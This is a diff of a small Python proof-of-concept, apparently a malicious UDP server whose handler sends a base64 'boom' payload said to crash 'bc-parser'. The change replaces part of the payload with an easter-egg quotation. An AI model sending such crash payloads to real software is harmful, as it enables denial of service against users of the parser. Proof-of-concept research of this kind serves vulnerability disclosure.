File tree Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Original file line number Diff line number Diff line change @@ -56,10 +56,11 @@ def PointlessASCIIBanner():
56
56
57
57
class DoubtfullyMalignant (socketserver .BaseRequestHandler ):
58
58
def handle (self ):
59
- # boom is a 110 byte response that kills bc-parser
60
- boom = "AQAAAAAAAAAAAAAAAAAAAIRZpwZtOxAAAgAAAHhWNBJ4VjQSeFY0Enh"
61
- boom += "WNBJ4VjQSeFY0EnhWNBJ4VjQSAAAAAAAAAADU2CEAAgAAADw8PDzMzM"
62
- boom += "zMmQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA="
59
+ # boom is a 110 byte response that kills bc-parser.
60
+ # May contain easter eggs.
61
+ boom = "QmVpbmcgY2FsbGVkIGEgdHJhaXRvciBieSBEaWNrIENoZW5leSBpcyB0"
62
+ boom += "aGUgaGlnaGVzdCBob25vdXIgeW91IGNhbiBnaXZlIGFuIEFtZXJpY2F"
63
+ boom += "umQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA="
63
64
sock = self .request [1 ]
64
65
print "{+} Handling connection from %s" % (self .client_address [0 ])
65
66
sock .sendto (boom .decode ("base64" ), self .client_address )
You can’t perform that action at this time.
0 commit comments